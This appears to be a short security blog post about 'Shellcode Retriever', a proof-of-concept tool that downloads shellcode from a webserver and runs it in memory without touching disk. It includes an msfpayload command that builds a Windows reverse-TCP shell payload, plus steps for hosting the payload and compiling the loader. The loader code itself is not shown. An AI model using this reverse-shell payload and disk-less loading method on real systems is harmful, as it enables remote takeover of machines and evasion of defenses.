Never Ending Security

It starts all here

Shellcode Retriever – POC of code that downloads and executes shellcode in memory.

Shellcode Retriever

Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method:


For use by IT Security professionals and researchers.


Create shellcode using the following msfpayload command:

msfpayload windows/shell_reverse_tcp LHOST= LPORT=8080 EXITFUNC=thread R > test.txt

Notice the exit function, very important if you want the process to run and beacon out based on timeouts in the source code.

Upload the shellcode to your webserver.

Compile the python code to an executeable by using pyinstaller.

More info can be found on:

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s